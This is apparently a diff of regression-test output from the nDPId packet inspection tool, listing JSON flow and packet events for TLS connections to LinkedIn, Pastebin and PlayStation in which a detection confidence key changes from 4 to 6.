EFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482860064,"flow_last_seen":1646482860092,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482860092,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01720{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":414,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482860064,"flow_last_seen":1646482860115,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4992,"flow_avg_l4_payload_len":713,"midstream":0,"thread_ts_msec":1646482860115,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","server_names":"www.linkedin.com,linkedin.com,rum5.perf.linkedin.com,exp4.www.linkedin.com,exp3.www.linkedin.com,exp2.www.linkedin.com,exp1.www.linkedin.com,rum2.perf.linkedin.com,rum4.perf.linkedin.com,rum6.perf.linkedin.com,rum17.perf.linkedin.com,rum8.perf.linkedin.com,rum9.perf.linkedin.com,afd.perf.linkedin.com,rum14.perf.linkedin.com,rum18.perf.linkedin.com,rum19.perf.linkedin.com,exp5.www.linkedin.com,realtime.www.linkedin.com,px.ads.linkedin.com,px4.ads.linkedin.com,dc.ads.linkedin.com,lnkd.in,px.jobs.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Sunnyvale, O=LinkedIn Corporation, CN=www.linkedin.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"CE:D8:A5:BE:BD:4B:EF:E9:22:C8:0D:55:A6:7A:A6:4A:B8:03:4A:53"}} +00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482860064,"flow_last_seen":1646482860092,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482860092,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+01720{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":414,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482860064,"flow_last_seen":1646482860115,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4992,"flow_avg_l4_payload_len":713,"midstream":0,"thread_ts_msec":1646482860115,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","server_names":"www.linkedin.com,linkedin.com,rum5.perf.linkedin.com,exp4.www.linkedin.com,exp3.www.linkedin.com,exp2.www.linkedin.com,exp1.www.linkedin.com,rum2.perf.linkedin.com,rum4.perf.linkedin.com,rum6.perf.linkedin.com,rum17.perf.linkedin.com,rum8.perf.linkedin.com,rum9.perf.linkedin.com,afd.perf.linkedin.com,rum14.perf.linkedin.com,rum18.perf.linkedin.com,rum19.perf.linkedin.com,exp5.www.linkedin.com,realtime.www.linkedin.com,px.ads.linkedin.com,px4.ads.linkedin.com,dc.ads.linkedin.com,lnkd.in,px.jobs.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Sunnyvale, O=LinkedIn Corporation, CN=www.linkedin.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"CE:D8:A5:BE:BD:4B:EF:E9:22:C8:0D:55:A6:7A:A6:4A:B8:03:4A:53"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482866432,"flow_last_seen":1646482866432,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482866432,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1646482866432,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482866432,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8sBtAAEAG\/aLAqAGAaBdivpv+AbuQtJSoAAAAAKAC+vAG0QAAAgQFtAQCCAoY1d1UAAAAAAEDAwc="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1646482866449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482866449,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGtMZoF2K+wKgBgAG7m\/4hqZihkLSUqYAS\/\/9k2gAAAgQFeAEBBAIBAwMK"} 
01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1646482866451,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482866451,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItsB1AAEAG+6\/AqAGAaBdivpv+AbuQtJSpIamYolAYAfYUJQAAFgMBAgABAAH8AwOkCw2THMGhALk0\/S0UPYY9Fiy1MMas0dLFjf2ObmEV3iD+CRapxYYnJ+AUET5SjxVSaJRJeT\/rvI5T4N1r2TpPLQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAxwYXN0ZWJpbi5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAg+1dFx2JbQxGMLbjHxdWGfdupB63kQdiHTmuNhsrVgTQAFwBBBKdDPqMFSChZhRpkv1Y2JjoX2aNL5O59XM1C0oY6ZFf1Ifckam\/eVu5cuFoipFrAsWBrxGiWt6uHvmWbTHpfZoYAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482866432,"flow_last_seen":1646482866451,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482866451,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01068{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":420,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482866473,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482866432,"flow_last_seen":1646482866451,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482866451,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01068{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":420,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482866473,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482879566,"flow_last_seen":1646482879566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482879566,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1646482879566,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879566,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZJ5AAEAGuDfAqAGAFwFEvd\/4Abu+RY+DAAAAAKAC+vCgEQAAAgQFtAQCCAqibL0tAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1646482879585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879585,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGI9YXAUS9wKgBgAG73\/iES9VYvkWPhKAS\/ojG\/QAAAgQFtAQCCApEcjdUomy9LQEDAwc="} 
01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1646482879590,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482879590,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5ZKBAAEAGtjjAqAGAFwFEvd\/4Abu+RY+EhEvVWYAYAfb4UwAAAQEICqJsvUREcjdUFgMBAgABAAH8AwPTmj1yotJrCU5Axy8WSqX4RbWM\/SINHTcC+qIJwwqdWyAtxwR2GOpVXqzss+L4QuffJNllYoSRruXn4YOMT1n2UQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAYABYAABN3d3cucGxheXN0YXRpb24uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIO+m+y4kE\/Ul0wRfLnWkNqXDSHnFmA3tI1g\/5Tv\/EZwCABcAQQQh+3EFl7VEJWAHnTsK42aVbCexqYTb9DwqjdAN6Pu9IMJwjvRFdXg\/Y6aZYu3btbo89OdSMmSsifn4YkrISGSJACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879566,"flow_last_seen":1646482879590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879590,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4380,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","server_names":"playstation.com,webforms.playstation.com,www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Mateo, O=SONY INTERACTIVE ENTERTAINMENT LLC, CN=www.playstation.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"19:BC:48:84:B7:B0:91:46:45:D5:DD:3B:B5:8D:8E:45:E8:42:1A:8A"}} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879566,"flow_last_seen":1646482879590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879590,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4380,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","server_names":"playstation.com,webforms.playstation.com,www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server 
CA","subjectDN":"C=US, ST=California, L=San Mateo, O=SONY INTERACTIVE ENTERTAINMENT LLC, CN=www.playstation.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"19:BC:48:84:B7:B0:91:46:45:D5:DD:3B:B5:8D:8E:45:E8:42:1A:8A"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482879964,"flow_last_seen":1646482879964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482879964,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1646482879964,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879964,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8nmNAAEAGzLvAqAGAFzP2QbS4AbvcfW4jAAAAAKAC+vARXQAAAgQFtAQCCAo1KzXVAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1646482879981,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879981,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGcx8XM\/ZBwKgBgAG7tLg0LEpK3H1uJKAS\/oiOFAAAAgQFtAQCCAqG0XpXNSs11QEDAwc="} 
01163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1646482879983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482879983,"pkt":"pJGxgjQ5PKn0qB\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"} -00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879964,"flow_last_seen":1646482879983,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879998,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
